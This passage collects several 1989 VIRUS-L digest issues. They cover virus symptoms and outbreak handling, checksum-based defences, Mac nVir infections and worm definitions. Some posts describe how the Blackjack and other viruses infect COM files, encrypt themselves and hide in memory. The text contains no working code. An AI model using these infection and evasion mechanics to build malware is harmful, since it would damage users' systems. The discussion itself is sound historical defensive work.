  11177. Permission is hereby granted to reproduce this article for non-profit
  11178. purposes, provided this notice is retained.
  11179.  
  11180. The Information Centre - PC Security by Dr Alan Solomon
  11181. - -------------------------------------------------------
  11182.  
  11183. PCs are intrinsically very insecure.  For many PCs, this might not
  11184. matter; who cares if someone finds out that the menu for tomorrow is
  11185. scrambled eggs?  But increasingly, PCs are being used for critical
  11186. applications, and either there is extremely important data on them, or
  11187. else it is very important that they continue to run.  Scrambled eggs
  11188. are fine - scrambled FAT is not.
  11189.  
  11190. Many people take backup for granted.  Obviously, backups are done on a
  11191. regular basis, but how do you know that you have something that is
  11192. restorable?  I'll be coming back to this in a subsequent article.  For
  11193. now, I want to update members on the virus front, because quite a lot
  11194. has happened, and much of what you read in the press is distorted by the
  11195. Chinese Whispers treatment.
  11196.  
  11197. Virus facts and fiction
  11198. - -----------------------
  11199.  
  11200. First, I have to say that the problems are very real.  You have probably
  11201. read in Computing that IBM has been infected by 1704 virus.  Secondly, I
  11202. must emphasise that viruses are still very, very rare on PCs, and many
  11203. problems reported as viruses, are t he same old problems we always had.
  11204. But they are getting commoner, and I am getting busier and busier in
  11205. dealing with outbreaks.
  11206.  
  11207. First, let me define some terms.  A virus is a self-replicating program,
  11208. that copies itself without the user realising that this is happening.  A
  11209. virus does not necessarily intend malicious damage.
  11210.  
  11211. The main damage is always, always done by people's reactions, not by the
  11212. viruses themselves.  There is one virus around that has code in it for
  11213. deleting files, and other viruses have unfortunate side-effects.  But
  11214. the main damage is usually done by someone panicking, and doing
  11215. something extremely silly, because they don't know what is the correct
  11216. procedure.
  11217.  
  11218. Viruses - what's out there?
  11219. ===========================
  11220.  
  11221. Next - a list of the viruses that I know of so far, plus how to
  11222. recognise them, and the intentional and unintentional damage done.
  11223. Please remember, though, that most of these viruses have more than one
  11224. variant, and it would be possible to write a virus that mimicked the
  11225. action of an existing virus.  So you mustn't assume that just because
  11226. your symptoms match those given below, that you have the exact same
  11227. virus.  Also, the information given below is only a summary of all the
  11228. information available, so please don't treat it as a full manual.
  11229.  
  11230. Stoned.  Every 32nd boot-up, you see ``Your computer is now stoned.''
  11231. The boot sectors of infected diskettes are obviously abnormal, and
  11232. include that message.  No intentional damage.  Unintentional damage -
  11233. trashes 1.2 Mb floppies if they have more than 32 files, trashes about
  11234. 5% of hard disks.
  11235.  
  11236. Brain.  You see (c) Brain as a volume label on diskettes, and diskettes
  11237. have 3k of bad sectors (the normal numbers are none at all, or 5k, or
  11238. sometimes more).  No known intentional damage.  Unintentional damage -
  11239. it slows down diskette accesses and causes time-outs, which can make
  11240. some diskette drives unusable.
  11241.  
  11242. Italian.  Once every half hour, if you are accessing the disk, the
  11243. bouncing dot is triggered.  The dot bounces off the edges of the screen,
  11244. and passes through any text, with replacement after it.  Sometime, this
  11245. doesn't work properly, and screen displays are messed up.  Infected
  11246. diskettes have 1k in bad sectors, infected hard disks have 2k (and other
  11247. numbers of bad sectors are possible).  No known intentional damage.
  11248. Unintentional damage - the two copies of the FAT are left different; DOS
  11249. might not like this.  Attempts to infect diskettes slows them down, and
  11250. some computers won't read floppies, due to time-outs.
  11251.  
  11252. 1813 virus.  Files grow by 1813 bytes (sometimes 1808), without changing
  11253. their date and time or read/write/ hidden attributes.  COMMAND.COM does
  11254. not grow, to help it avoid detection.  Many anti-virus products do
  11255. little more than watch COMMAND.COM.  Intentional damage - there is code
  11256. in the virus for deleting each program that you run on every Friday
  11257. 13th.  Half an hour after the virus installs into memory, the computers
  11258. slows down - a 4.77Mhz PC runs at about 1/5 normal speed.  A small black
  11259. window opens temporarily in the bottom left hand corner.  Unintentional
  11260. damage - .COM files grow once, taking up slightly more space.
  11261. Also, .EXE files grow each time they are infected, and eventually will
  11262. not load.
  11263.  
  11264. 648 virus.  .COM files grow by 648 bytes, without changing date/time or
  11265. attributes.  Intentional damage - one infected file in eight (at random)
  11266. is changed in such a way that the program will not run.  No known
  11267. unintentional damage.
  11268.  
  11269. 1701 virus.  Files grow by 1701 bytes.  This is a third generation virus
  11270. - - the code is encrypted, to fool programs that search for viruses
  11271. automatically, looking for code that is characteristic of viruses.  This
  11272. also meant that disassembling it took a bit longer than usual, but I've
  11273. now finished the disassembly.  Occasionally, 1701 triggers a
  11274. ``hailstorm''.  The characters on the screen behave as if the were
  11275. pinned to the screen, and someone is removing the pins one at a time -
  11276. it looks a bit like a hailstorm, and has suitable sound effects.  In
  11277. fact, it is a purely audio-visual effect - nothing is happening to your
  11278. data.  But most people seeing it, would be so alarmed that they would
  11279. reach for the off switch, and switching a computer off in the middle of
  11280. processing a database can cause big problems.  IBM got infected recently
  11281. by 1704 virus, which I believe is a slightly different version of 1701.
  11282. They sent a letter to all customers that could conceivably have been
  11283. infected - a very responsible thing to do.
  11284.  
  11285. As you can see, there are an increasing number of viruses, and an
  11286. increasing number of people affected.
  11287.  
  11288. If you see any of these symptoms, you should do three things.
  11289.  
  11290. 1. DON'T PANIC.  That does more damage than anything else.  Don't just
  11291. start deleting and formatting - at least keep a specimen so that I can
  11292. disassemble it.  The flame thrower approach tends to destroy the
  11293. evidence of how it got in (which could help the unfortunate person that
  11294. inadvertently gave it to you) and without even fixing the problem.
  11295. Don't let anyone else panic, either.
  11296.  
  11297. 2. Make sure that everyone who knows about it, is told to keep their
  11298. mouths shut.  The press are desperately keen to find a big company that
  11299. has been struck, and will have a field day.  An immense amount of damage
  11300. could be done to the company's name . If the company decides to tell the
  11301. world, that's fine and noble, but the decision must be made at the
  11302. highest possible level.
  11303.  
  11304. 3. Seek expert advice.  Do not attempt to deal with it yourself -
  11305. unless you have already dealt with several cases before, a virus is
  11306. outside your experience.  In particular, the virus MUST be disassembled
  11307. - - otherwise it could have many surprises.
  11308.  
  11309. One of the biggest problems is in dealing with the diskettes.  Every PC
  11310. is accompanied by a vast cloud of diskettes, and at least some of these
  11311. must be infected.  Usually, less than 1% are infected (although in the
  11312. case of a boot sector virus such as Brain, Italian or Stoned, anything
  11313. up to 5% of diskettes could be infected before the virus is spotted),
  11314. but the problem is to find them.  If you leave even one infected
  11315. diskette - well, it was almost certainly just one diskette that brought
  11316. the problem in.  My approach is to use a hopper-fed machine that can
  11317. check 700 floppy diskettes per hour; the main alternative is to train
  11318. sufficient operators to do it manually.
  11319.  
  11320. How you treat infected disks and diskettes depends on the virus, and its
  11321. modus operandi.  I haven't yet seen a situation where it was necessary
  11322. for anyone to lose any data, although the flame- thrower approach
  11323. certainly can do damage.
  11324.  
  11325. As if this wasn't bad enough, there are now a few more problems that I'm
  11326. trying to fight.  The first is too late - one magazine has published
  11327. about 55% of the Italian virus, together with a useful plethora of
  11328. technical information about how it works.  I won't tell you which
  11329. magazine, as I don't want things to get any worse, but many members will
  11330. have seen the article, and I would suggest that you write to the editor
  11331. to express your own opinions on the subject.
  11332.  
  11333. The next problem is that a magazine has quoted someone as saying that he
  11334. could write a virus that ``could put a software house out of business
  11335. overnight''.  I don't think that the magazine should have used that
  11336. quote, and I hope that it doesn't give people ideas.
  11337.  
  11338. But the third problem is the worst.  I have a firm rule about never
  11339. giving copies of a virus ``for experimental and research purposes'' to
  11340. anyone (except, of course, if a company already has the virus then it
  11341. doesn't matter).  One could argue that this is tantamount to
  11342. suppression of useful information (and this has been suggested to me).
  11343. But obviously one should only give a virus to a responsible, technically
  11344. capable person, and I'm frankly not very good at assessing this over the
  11345. phone - I get many calls asking for viruses.  So, since I can't be sure
  11346. that the person asking is a suitable candidate, I have so far always
  11347. refused.  If a bona fide government department were to approach me, I
  11348. would probably feel different, but that hasn't happened.
  11349.  
  11350. One of the people who felt differently on this point, has obtained
  11351. copies of Brain and Italian.  He has said that he will give copies to
  11352. anyone responsible person who asks him, for research purposes.  I don't
  11353. know how he will decide, but I hope and pray that he is better at
  11354. judging character that I believe possible, and able to detect a
  11355. plausible liar.  He says that he is acting from the highest, noblest
  11356. motive - freedom of information.  I used to believe in freedom of
  11357. information myself, so I can almost understand him.  But I profoundly
  11358. disagree with what he's doing, as the easiest way to write a virus, is
  11359. to disassemble someone else's, and change it to do what you want.
  11360.  
  11361. How to learn more
  11362. - -----------------
  11363.  
  11364. The best way to keep up to date with virus developments is on Connect
  11365. (01-863 6646 - 1200, N, 8, 1).  There are a number of conferences
  11366. devoted to viruses.  This article was posted to Connect in conference
  11367. connect.virus on January 10th and I will be posting further updates to
  11368. this list of known viruses with their symptoms and effects as soon as I
  11369. have details.
  11370.  
  11371. One thing I have done is write a program for testing anti-virus
  11372. products.  This uses a few different methods for writing to the boot
  11373. sector of floppy diskettes - TESTVACC is quite harmless, of course, but
  11374. it is doing something that many viruses do.  Many anti-virus products
  11375. claim to be able to detect and/or prevent this sort of thing, so you
  11376. install your anti-virus program, and then run TESTVACC.  TESTVACC tries
  11377. to write a simple message to the boot sector of the floppy disk, using
  11378. four different methods, any of which could be used by a virus.
  11379.  
  11380. I've tried several well-known anti-virus products, and although it
  11381. detected the first two methods of writing to the boot sector, it didn't
  11382. notice the third or fourth method.  You can inspect the boot sector
  11383. afterwards, using whatever disk sector editor you like, and draw your
  11384. own conclusions.  I'm making TESTVACC shareware, so it is available from
  11385. the User Group Library.
  11386.  
  11387. Also we hope to run a special series of workshops on viruses in the near
  11388. future.  If you would like to take part then please write to me at the
  11389. User Group.  This workshop will look at ways of reducing the risk of
  11390. infection, what to do if you think you are infected and in the event of
  11391. infection how to disinfect your systems.
  11392.  
  11393. Submitted by: Alan Jay (alanj@ibmpcug.CO.UK), Editor, Connectivity,
  11394.               the newsletter of The IBM PC User Group, UK.
  11395. - --
  11396. Alan Jay @ The IBM PC User Group, PO Box 360, Harrow HA1 4LQ ENGLAND
  11397. Phone:  +44 -1- 863 1191                        Email:  alanj@ibmpcug.CO.UK
  11398. Path:   ...!ukc!pyrltd!slxsys!ibmpcug!alanj     Fax: +44 -1- 863 6095
  11399. Disclaimer: All statements made in good faith for information only.
  11400.  
  11401. ------------------------------
  11402.  
  11403. End of VIRUS-L Digest
  11404. *********************VIRUS-L Digest             Tuesday, 24 Jan 1989         Volume 2 : Issue 24
  11405.  
  11406. Today's Topics:
  11407. Ken Hoover's Sick Mac
  11408. Features of Blackjack Virus (PC)
  11409. Checksum programs and Otto's principles
  11410. Mac problems part III
  11411.  
  11412. ---------------------------------------------------------------------------
  11413.  
  11414. Date:         Tue, 24 Jan 89 10:22:22 EST
  11415. From:         Joe McMahon <XRJDM@SCFVM.GSFC.NASA.GOV>
  11416. Subject:      Ken Hoover's Sick Mac
  11417.  
  11418. First, you MUST get a more recent version of Interferon. I can't
  11419. stress this enough. Version 1.0 is *full* of holes, and two out of the
  11420. 5 known viruses didn't even exist when it was written.
  11421.  
  11422. I will send you the most recent copies I have of both Virus RX and
  11423. Interferon. Please rerun the tests and let me know if the problem is
  11424. trapped by these newer versions.
  11425.  
  11426. Note to all Mac disinfectors: It is IMPERATIVE that you stay up to
  11427. date on anti-viral software. The virus writers ARE getting copies of
  11428. the programs, and they ARE trying to write around them.
  11429.  
  11430.  --- Joe M.
  11431.  
  11432. ------------------------------
  11433.  
  11434. Date:    24 January 89, 17:25:02 +0100 (MEZ)
  11435. From:    Otto Stolz <RZOTTO@DKNKURZ1.BITNET>
  11436. Subject: Features of Blackjack Virus (PC)
  11437.  
  11438. Hello,
  11439.  
  11440. perhaps you remember the virus incident I reported on this list, on 2
  11441. September 88, 14:44:40 +0200 (MESZ).  This note is intended to present
  11442. some of the results and insights I gained since.  Most of the facts
  11443. presented here have not been detected by myself; rather I have to
  11444. thank several people in the local area, and several VIRUS-L
  11445. subscribers, for their hints and contributions.
  11446.  
  11447. This virus has been termed "Blackjack", which is a pun on the German
  11448. name "17+4" of the popular card game.  Blackjack reveals its existence
  11449. by the length of infected COM-files, which is 1704 Bytes too large.
  11450.  
  11451. As with the Israeli virus strains, the virus has a two-stage
  11452. life-cycle:
  11453.  
  11454. - - when you invoke an infected program, Blackjack will infect RAM;
  11455.  
  11456. - - when Blackjack is active in RAM, it will infect every COM file being
  11457.   invoked.  This can be exploited for an easy test, e.g.:
  11458.      copy con: test.com
  11459.      {ALT-144} {ALT-205} {Blank} {CTRL-z} {return}
  11460.      dir test.com
  11461.      test
  11462.      dir test.com
  11463.   In the second line above, every brace-pair represents one byte entered;
  11464.   if you key in these bytes correctly, you'll read a Capital Letter E
  11465.   with Acute Accent, a Horizontal Double-Line Segment, a Blank, a Circum-
  11466.   flex Accent, and a Capital Letter Z.  The 1st dir-command, above,
  11467.   should report that
  11468.   TEST.COM is 3 bytes long; if the 2nd dir reports 1707 bytes, instead,
  11469.   your RAM, and hence the TEST.COM file, are infected by some virus--most
  11470.   probably Blackjack.
  11471.  
  11472. Blackjack infects only COM-files which are at least 3 Bytes long, and
  11473. it does so only once for any given file.  It overwrites the 1st three
  11474. bytes with a JMP to the beginning of the viral code, which is appended
  11475. to the file.  The 2 byte address of this JMP instruction is probably
  11476. the reason why only COM files are susceptible to infection.  Blackjack
  11477. retains the file's time stamp.  It even infects read-only files; on
  11478. write-protected floppy disks, it attempts writing 5 times per file,
  11479. thus revealing its activity.
  11480.  
  11481. In the infected file, the viral code is cryptographically encoded,
  11482. using a simple Vigenere code depending on the length of the file; only
  11483. the instructions for decoding the encrypted part of the code are in
  11484. plain machine-language.  This is obviously intended as a impediment
  11485. against disassembling.  Hence, every copy of the virus looks different
  11486. (depending on the length of the file).
  11487.  
  11488. On invocation of an infected program, Blackjack installs itself in RAM
  11489. (if no copy is already installed), then replaces the JMP instruction
  11490. with its former contents and resumes normal program operation.
  11491.  
  11492. The storage map shows that Blackjack has tinkered with the free
  11493. storage pointer-chain to hide the fact that it has hooked interrupt
  11494. 21.  Hence, only a minor part of Blackjack is visible in the storage
  11495. map.
  11496.  
  11497. In every year, from October to December, Blackjack will interfere with
  11498. CGA or EGA operated screens, moving randomly chosen characters down,
  11499. like falling leaves in autumn.  After a while, you'll have a big heap
  11500. of characters at the bottom of your screen, and as you cannot see
  11501. anymore what the computer is trying to display, you'll probably have
  11502. to restart the system.  This behaviour has been predicted by two
  11503. people, who have disassembled Blackjack, and has later been observed
  11504. on many EGA-equipped ATs.
  11505.  
  11506. Together with two students, I have written a VIRCHECK program to check
  11507. for Blackjack in RAM and in disk files.  VIRCHECK exploits the
  11508. signaling device Blackjack uses to ensure at most one active copy to
  11509. detect Blackjack in RAM; it searches the files for the few
  11510. instructions which are alike in every copy, to detect infected files.
  11511. At our consultant desk, everybody can obtain a copy of VIRCHECK
  11512. (Pascal source, and EXE-file), plus a 16 kByte memo (in German) and
  11513. the 3 Byte TEST.COM (cf. above).
  11514.  
  11515. An employee of a nearby software-house, who has detected Blackjack, in
  11516. the 1st time, has circulated a DELVIRUS program to detect Blackjack
  11517. and, optionally, repair infected files (taking the original contents
  11518. of the 1st three bytes from the viral code meant to replace them, as
  11519. explained above.  As the DELVIRUS's source is not available to the
  11520. public (nor to myself), we do not distribute this program (nor
  11521. recommend its use).
  11522.  
  11523. That's it, folks.  I hope I didn't bore you.
  11524.              Otto
  11525.  
  11526. [Ed. Thanks for the detailed description, Otto!]
  11527.  
  11528. ------------------------------
  11529.  
  11530. Date:        Tue,  24 Jan 89 18:42:12 +0200
  11531. From:        Y. Radai <RADAI1@HBUNOS.BITNET>
  11532. Subject:     Checksum programs and Otto's principles
  11533.  
  11534.   David Chess writes:
  11535. >                                              Consider, for instance,
  11536. >a modification-detection program that works using a nice long CRC
  11537. >(at least 30 bits), and that uses a "user-selectable" polynomial
  11538. >(for instance, the program might prompt the user for a long string
  11539. >when it's first run, and use that to find an irreducible polynomial).
  11540. >...
  11541. >I think I would claim that knowing all about the checking program,
  11542. >including having the commented source code, would do the virus-writer
  11543. >NO GOOD AT ALL in trying to defeat it (as long as the user's secret
  11544. >key isn't known, of course).  ...
  11545.  
  11546. >Objections?
  11547.  
  11548.   Yes, I have objections.  Even assuming a program which is based on a
  11549. user-selected or randomly selected polynomial (and many checksum
  11550. programs are not based on this), the problem with the great majority
  11551. of such programs is that the authors seem to think that it's suffi-
  11552. cient to checksum every file and that the only danger is that someone
  11553. might discover the generating polynomial or secret key or by other
  11554. means succeed in forging a checksum.  That's *not* the only danger.
  11555. The main danger is that there are "loopholes" in OSs, particularly in
  11556. DOS, which can be exploited to circumvent the checksum scheme, and
  11557. it's *much* simpler to exploit such a loophole (if you can think of
  11558. one) than to forge a checksum.  (The most trivial example of a loop-
  11559. hole is forgetting that the boot sector contains executable code and
  11560. therefore thinking that checksumming can be restricted to files
  11561. alone.)  Altogether, I know of 6 loopholes.
  11562.  
  11563.   Now of the 7 freeware checksum programs which which I am familiar,
  11564. not a single one takes these loopholes into consideration, and that
  11565. includes the one published by Fred Cohen in the April 88 issue of
  11566. Computers & Security.  As for commercial programs, there is one,
  11567. VirAlarm (an Israeli product, not to be confused with Lasertrieve's
  11568. product having the same name), which presently takes into account 5 of
  11569. the 6 loopholes.  (Since I have mentioned the 6th one to the authors,
  11570. it will undoubtedly be incorporated into their next version.)  Unfor-
  11571. tunately I am not familiar with any other commercial products, so I
  11572. can't say whether any of them block these loopholes as well, but I'd
  11573. be willing to bet that none of them blocks more than 4 of the loop-
  11574. holes, and the great majority not more than two of them.
  11575.  
  11576.   In a VIRUS-L posting of mine in September I mentioned that I was
  11577. preparing a paper on checksum programs as an anti-viral measure, in
  11578. which these loopholes would be described.  I much too optimistically
  11579. stated that the paper would be ready in a few weeks.  Unfortunately,
  11580. the project has taken much more time than I thought (it's already
  11581. about 700 lines long) and I have lots of other work to do, so it
  11582. probably won't be ready for another month or two.  I take this oppor-
  11583. tunity to apologize to those who wrote to me asking for information
  11584. concerning these loopholes.  (BTW, the question arises whether by pub-
  11585. lishing these loopholes I wouldn't be doing more service to the cre-
  11586. ators of viruses, some of whom are possibly on this list, than to the
  11587. writers of anti-virus software.  Anyone got any advice on this?)
  11588.  
  11589.   In any case, I do not agree with David's implication that the "First
  11590. Main Proposition of Virus Hunting" which was stated by Otto Stolz is
  11591. too strong, at least not because of the reasoning which David has
  11592. given.  For just as I discovered an unblocked loophole in VirAlarm by
  11593. knowing how it works, so some virus creator might discover a new one
  11594. even in a checksum program which blocks all presently known loopholes.
  11595.  
  11596.   By the way, as has been implied by some contributors, the
  11597. propositions mentioned by Otto were stated much earlier by Fred Cohen.
  11598. In Computers & Security, V6, N6, p. 30 they appear in the following
  11599. words: "any particular virus can be detected by a particular detection
  11600. scheme" and "any particular detection scheme can be circumvented by a
  11601. particular virus", or more compactly, "no infection can exist that
  11602. cannot be detected, and no mechanism can exist that cannot be
  11603. infected."
  11604.  
  11605.                                            Y. Radai
  11606.                                            Hebrew Univ. of Jerusalem
  11607.  
  11608.   P.S.  The offer by Yuval Tal in V2 #21 to send VirAlarm to anyone
  11609. who requests it was completely irresponsible since it is a commercial
  11610. product.
  11611.  
  11612. [Ed. Thank you for bringing that to our attention.]
  11613.  
  11614. ------------------------------
  11615.  
  11616. Date:         Tue, 24 Jan 89 20:18:59 ECT
  11617. From:         Ken Hoover <CONSP21@BINGVMA.BITNET>
  11618. Subject:      Mac problems part III
  11619.  
  11620.   I was pleased to find a response to my message of less than 24 hours
  11621. ago sitting in my mailbox.  Scott (@DUVM) was quick enough to notice
  11622. that the locked disk was the instigator of my printer troubles.
  11623. However, there's more to report.
  11624.  
  11625.   Rather than send a third essage on the same subject to this list, I
  11626. worked with the user in question for a few minutes.  As I noted in the
  11627. second (shorter) message, by setting the system date back 20 days or
  11628. so, the disk mysteriously unlocked itself and we were able to print
  11629. (only) one document (from MacWrite) before the bomb returned with
  11630. error code 28.
  11631.  
  11632.   Stupid me forgot to look and see if the disk had re-locked itself.
  11633.  
  11634.   I'm less worried about the printing problem than I am about the
  11635. possibility that we have some sort of mac disk-locking bug.  I'm going
  11636. to get back to that user as soon as I can to see what (if anything)
  11637. has happened in the last 24 hours.
  11638.  
  11639. Kenneth J. Hoover
  11640. UG Consultant, Public Terminal and Microcomputer Complex
  11641. SUNY-Binghamton  (Binghamton, NY, USA)
  11642.  
  11643. Disclaimer : These are my opinions.  I'm not paid enough to represent
  11644.              my employers'.
  11645.  
  11646. ------------------------------
  11647.  
  11648. End of VIRUS-L Digest
  11649. *********************VIRUS-L Digest            Wednesday, 25 Jan 1989        Volume 2 : Issue 25
  11650.  
  11651. Today's Topics:
  11652. Clarification on "Otto's principles"
  11653. re: Checksum programs and Otto's principles
  11654. Request for definition of worms and trojan horses.
  11655. Friday the 13th worm at Digital Equipment Corp.
  11656.  
  11657. ---------------------------------------------------------------------------
  11658.  
  11659. Date:        25 January 89, 12:01:07 MEZ
  11660. From:        Otto Stolz    <RZOTTO@DKNKURZ1.BITNET>
  11661. Subject:     Clarification on "Otto's principles"
  11662.  
  11663. Yisrael Radai writes:
  11664. > the propositions mentioned by Otto were stated much earlier
  11665.  
  11666. These propositions were never meant to be an original statement of
  11667. mine.  Rather, I sent an answer to somebody having posted a
  11668. virus-related question in the LIAISON list, and I thought this would
  11669. be intersting to VIRUS-L subscribers, as an example how to present
  11670. basic ideas to "the public".
  11671.  
  11672. Regrettably, I was not aware that the message-header (which would have
  11673. revealed my intention) was bound to be stripped off during VIRUS-L's
  11674. digesting process.  Hence, in similar cases, I'll have to prepare a
  11675. separate copy of my note for VIRUS-L to include a suitable
  11676. introductory statement.
  11677.  
  11678. Otto
  11679.  
  11680. ------------------------------
  11681.  
  11682. Date: 25 January 1989, 09:26:57 EST
  11683. From: David M. Chess <CHESS@YKTVMV.BITNET>
  11684. Subject:  re: Checksum programs and Otto's principles
  11685.  
  11686. Y. Radai's reply to me in v2n24 is largely well-taken.  I didn't mean
  11687. to imply that the scheme I described was itself a perfect virus
  11688. defense, although it probably sounded that way.  All I meant to
  11689. suggest by the example is that there is *some* hope for anti-virus
  11690. schemes in which it will do the virus writer little or no good to have
  11691. the source of the anti-virus program, and that it will therefore not
  11692. forever be the case that anti-virus efforts must depend on the
  11693. ignorance of the virus authors.
  11694.  
  11695. Radai, if you're going to tell us about the "loopholes" anyway, why
  11696. not just list them here, to give us something to think about while we
  11697. await the finished paper?  (I have no particular advice about whether
  11698. or not to reveal them, although I think it's unlikely that a decision
  11699. by you not to talk about them would do much to keep the virus writers
  11700. from discovering them!)
  11701.  
  11702. On "no mechanism can exist that cannot be infected": again, I think
  11703. that's too strong ("never say never...").  A virus would have a hard
  11704. time infecting a progra stored in ROM, for instance: if the ROM was
  11705. clean when burned (and it's certainly possible to verify that), it'll
  11706. stay that way, no?
  11707.  
  11708. In general, of course, it's a good idea to think about ways that a
  11709. virus author could get around any particular anti-virus scheme.  But I
  11710. don't think we'll *necessarily* see an unending escalation.
  11711.  
  11712. DC
  11713.  
  11714. ------------------------------
  11715.  
  11716. Date:     Wed, 25 Jan 89 11:35 EST
  11717. From:     Cincinnati Bengals. <KUMMER@XAVIER.BITNET>
  11718. Subject:  Request for definition of worms and trojan horses.
  11719.  
  11720.      Could anyone give me a definition of what a trojan horse and a
  11721. worm is, and what makes these different from viruses?
  11722.  
  11723. Thanks
  11724.  
  11725. Tom Kummer
  11726.  
  11727. ------------------------------
  11728.  
  11729. Date: Wed, 25 Jan 89 14:40:34 est
  11730. From: ubu!luken@lehi3b15.csee.lehigh.edu
  11731. Subject: Friday the 13th worm at Digital Equipment Corp.
  11732.  
  11733. >From Digital News, January 23, 1989 issue (author Stephen Lawton):
  11734.  
  11735. "A late-night, Friday-the-13th worm that entered Digital Equipment
  11736. Corp.'s internal Easynet network in Maynard, Mass., earlier this month
  11737. bit off more than it could chew.  A systems manager spotted the
  11738. abnormal activity 'virtually as it entered' and was able to segregate
  11739. the infected system before the worm could spread, according to the
  11740. company.
  11741.  
  11742. Spokeswoman Nikki Richardson said the infected system was disconnected
  11743. immediately from the network while a vaccine program was developed and
  11744. installed.  The system was returned to the network before employees
  11745. arrived for work Monday morning, she said.
  11746.  
  11747. Unlike a virus, which replicates itself and destroys or modifies
  11748. data, a worm only replicates itself.
  11749.  
  11750. Digital would not disclose what type of system was involved, although
  11751. Richardson said she believes it was a VMS-based system, the
  11752. predominant system on the network."
  11753.  
  11754. Interesting...  It's nice to hear that DEC was able to stop it before
  11755. it caused any harm, I imagine that a congratulations is in order if
  11756. the report is accurate.
  11757.  
  11758. The scary part about the report, in my opinion, is the definition of
  11759. virus vs. worm; it's blatantly wrong.  In "Computer Viruses: Theory
  11760. and Experiments" (Computers & Security 6 (1987) p. 22-35), Fred Cohen
  11761. defined a virus as, "...a program that can 'infect' other programs by
  11762. modifying them to include a possibly evolved version of itself."
  11763. There's no mention of destroying or modifying data there.  In fact, in
  11764. his dissertation, Dr. Cohen even used an example of a virus that could
  11765. be worthwhile, a "compression virus" that would compress executable
  11766. files on disk in order to save disk space.
  11767.  
  11768. Ken
  11769.  
  11770. ------------------------------
  11771.  
  11772. End of VIRUS-L Digest
  11773. *********************VIRUS-L Digest             Thursday, 26 Jan 1989        Volume 2 : Issue 26
  11774.  
  11775. Today's Topics:
  11776. nVir (init 29) (Mac)
  11777. Viral protection by checksum registration?
  11778.  
  11779. ---------------------------------------------------------------------------
  11780.  
  11781. Date:         Wed, 25 Jan 89 15:13:46 EST
  11782. From:         SCOTT <LICHTBLS@DUVM.BITNET>
  11783. Subject:      nVir (init 29) (Mac)
  11784.  
  11785.   I have encountered this new strain of nVir on a bunch of Mac II's
  11786. with Interferon, but have not been able to successfully eradicate the
  11787. infection.  Also Ferret, VirusRx, and virus detective are not able to
  11788. identify this virus.  The virus also shows up as a code segment ID 255
  11789. or 256 which is 712 bytes long as previously noted.  What is the best
  11790. way to eradicate this "thing"?  Is this new strain of any potential
  11791. danger to documents saved on a different disk or will it just cause
  11792. memory problems when the infected machine is used?
  11793.         Help!!
  11794.         Scott.
  11795.  
  11796. ------------------------------
  11797.  
  11798. Date:     Wed, 25 Jan 89 14:44 MDT
  11799. From:     Pete Klammer 303/556-3915 <PKLAMMER@CUDENVER.BITNET>
  11800. Subject:  Viral protection by checksum registration?
  11801.  
  11802. We could have some protection against viruses if we could compare a
  11803. characteristic "signature" of a program file against a "register" of
  11804. known program signatures.  The "signature" would have to be fairly
  11805. strong, and the problems of trusted registration and distribution of
  11806. copies of the register are non-trivial.  Furthermore, a virus attack
  11807. can spread more quickly than registered-signature checking can be
  11808. done, but at least this method offers some assurance when we're
  11809. looking at a clean system.  For that matter, it would let us know if
  11810. we're looking at identical copies of a known virus, vs.  slightly
  11811. twiddled ones.
  11812.  
  11813. What I'm suggesting is that something like a checksum be defined, but
  11814. it must be long and complex enough, and include the file size, such
  11815. that a counterfeit file of the same size and signature which could
  11816. even execute at all, let alone do any useful viral-like damage, would
  11817. be too hard or too expensive to come up with.  A checksum is too weak:
  11818. I can produce any checksum I want from any file if I have a few spare
  11819. bytes to "seed" with checksum-compensating values.  Rather, the
  11820. algorithm for the "anti-viral-signature" of a file would have to be
  11821. more like a high-order cyclic redundancy check or one-way trap-door
  11822. encryption.
  11823.  
  11824. I'm also suggesting that a common, trustworthy repository for
  11825. registration of program files be set up.  I could then know that
  11826. FORMAT.COM for PC-DOS 2.1 has signature "1140745HL2K6G76G724", and
  11827. FORMAT.COM for Zenith MS-DOS 3.1 has signature "1047HD2468K7G6762GR4",
  11828. and so forth.  Over time, that could get to be a long list: how many
  11829. legitimate versions of C1.EXE (or whatever) for Microsoft C have
  11830. actually been distributed (3.0, 4.0, 4.01, 4.1, 5.0, 5.01?, 5.1...?).
  11831. And of course, versions of the "anti-viral-signature-checker" would
  11832. have to be registered, too.
  11833.  
  11834. With these tool, one could, on occasion or even constantly in "TSR
  11835. background spare time", scrutinize a file system for corruptions.  The
  11836. "background" method is itself vulnerable to viral infiltration, but I
  11837. should still be able to boot up from a trusted write-protected* floppy
  11838. and scan my files whenever things get suspicious.
  11839.  
  11840. (*NOTE on that noisy subject: PC floppy drives implement write
  11841. protection in the hardware quite simply: the "write-enable" pin of the
  11842. floppy-disk-controller chip receives its signal from an AND gate --
  11843. i.e., whenever you ask to write, AND the write-enable notch is
  11844. detected, it writes.  Commodore-64 drives (1541's) do not have such a
  11845. hardware AND gate, and in fact, their ROM firmware can be overridden
  11846. by executable code downloaded into into on-board RAM.  [Speculation
  11847. now:] Since Apple ]['s do so much disk control, and so economically,
  11848. from inside the 6502 processor, I suspect Apple ][ write protection is
  11849. firmware-based, too.  These kinds of implementations feed the
  11850. write-protect misunderstanding.  REAL drives cannot write over a
  11851. write-protect tab.)
  11852.  
  11853. I recognize the anti-viral-signature method might be too cumbersome to
  11854. catch a virus in the act, but wouldn't it be worthwhile to have a way
  11855. to check if the ARC v5.13 or the MS-KERMIT v2.32A you just downloaded
  11856. from somewhere is clean or crooked?
  11857.  
  11858.  * --poko       Pete Klammer, Systems Programmer, (303)556-3915
  11859.  *              CU-Denver Computing Services / Campus Box 169
  11860.  *              1200 Larimer St NC2506 / Denver CO 80204-5300
  11861.  *              BITNET: PKLAMMER@CUDENVER
  11862.  *              INTERNET: PKLAMMER@PIKES.COLORADO.EDU
  11863.  * " I'm half Estonian, which makes up for the other half. "
  11864.  
  11865. [Ed. Ideas like this have been tossed around quite a bit, and they
  11866. certainly hold some promise (imho).  They also have a lot of potential
  11867. logistics problems (e.g., who distributes the CRC program itself, and
  11868. how do we assure that *it* is not corrupt?  a computing environment
  11869. in which everyone uses the same CRC (or checksum...) would be, as it
  11870. is now, relatively homogeneous - a virus could make use of this fact,
  11871. and propagate freely throughout the environment.).  Comments?]
  11872.  
  11873. ------------------------------
  11874.  
  11875. End of VIRUS-L Digest
  11876. *********************VIRUS-L Digest             Thursday, 26 Jan 1989        Volume 2 : Issue 27
  11877.  
  11878. Today's Topics:
  11879. PC hardware protection (PC)
  11880. re: Request for definition of worms and trojan horses.
  11881. Re: [LICHTBLS@DUVM.BITNET: nVir (init 29) (Mac)]
